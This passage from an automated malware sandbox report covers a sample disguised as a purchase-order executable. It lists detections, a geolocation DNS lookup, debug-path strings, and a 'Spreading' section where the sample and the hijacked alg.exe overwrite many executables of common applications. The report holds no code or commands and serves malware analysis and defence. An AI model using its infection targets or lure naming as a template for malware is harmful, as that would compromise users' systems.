                        Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                        Source: PO #09465610_GQ 003745_SO-242000846.exeJoe Sandbox ML: detected

                        Location Tracking

                        barindex
                        Source: unknownDNS query: name: reallyfreegeoip.org
                        Source: PO #09465610_GQ 003745_SO-242000846.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49712 version: TLS 1.0
                        Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000003.00000003.2571726187.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2053758653.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000003.00000003.2635972950.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2627279177.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2625776656.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.2225655829.00000000014D0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000003.00000003.2390711215.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000003.00000003.2390711215.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000003.00000003.2405957851.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.2700657166.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2696751735.0000000000490000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
                        Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb source: OSPPREARM.EXE.3.dr
                        Source: Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.3.dr
                        Source: Binary string: _.pdb source: RegSvcs.exe, 0000000D.00000002.2136041654.0000000002711000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2137004258.0000000002A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2139311354.0000000003C95000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.2290135083.000000000398F000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: crashreporter.pdb source: alg.exe, 00000003.00000003.2847166658.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: plugin-container.pdb source: alg.exe, 00000003.00000003.2933295512.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: Grinnellia.exe, 00000008.00000003.2095158890.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000003.2093103078.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2113799471.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2123309552.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2239183248.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2231355284.0000000004990000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.2361122927.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000003.00000003.2566964234.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000003.00000003.2670954388.0000000000490000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.2583011875.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590018724.0000000001430000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000003.00000003.2443691533.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000003.00000003.2248053012.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: pingsender.pdb source: alg.exe, 00000003.00000003.2911797634.0000000001450000.00000004.00001000.00020000.00000000.sdmp, pingsender.exe.3.dr
                        Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000003.00000003.2405957851.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000003.00000003.2269957277.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: private_browsing.pdb source: alg.exe, 00000003.00000003.2954259181.0000000001440000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000003.00000003.2248053012.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000003.00000003.2635972950.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2627279177.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2625776656.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.2361122927.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000003.00000003.2471181991.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.2225655829.00000000014D0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.2700657166.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2696751735.0000000000490000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
                        Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000003.00000003.2881829514.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2546360470.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000003.00000003.2670954388.0000000000490000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: firefox.pdb source: alg.exe, 00000003.00000003.2874633296.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000003.00000003.2530364880.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: firefox.pdbP source: alg.exe, 00000003.00000003.2874633296.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000003.00000003.2443691533.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\setup.exe.pdb source: setup.exe1.3.dr
                        Source: Binary string: private_browsing.pdbp source: alg.exe, 00000003.00000003.2954259181.0000000001440000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000003.00000003.2571726187.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000003.00000003.2471181991.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000003.00000003.2535143578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000003.00000003.2566964234.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000003.00000003.2881829514.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.2583011875.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590018724.0000000001430000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: Grinnellia.exe, 00000008.00000003.2095158890.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000003.2093103078.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2113799471.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2123309552.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2239183248.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2231355284.0000000004990000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000003.00000003.2488059253.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ALG.pdb source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2060386769.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OSPPREARM.EXE.3.dr
                        Source: Binary string: ALG.pdbGCTL source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2060386769.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000003.00000003.2269957277.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: updater.pdb source: alg.exe, 00000003.00000003.2980929452.0000000001440000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.2665025413.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2535143578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000003.00000003.2488059253.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.2665025413.0000000000400000.00000004.00001000.00020000.00000000.sdmp

                        Spreading

                        barindex
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
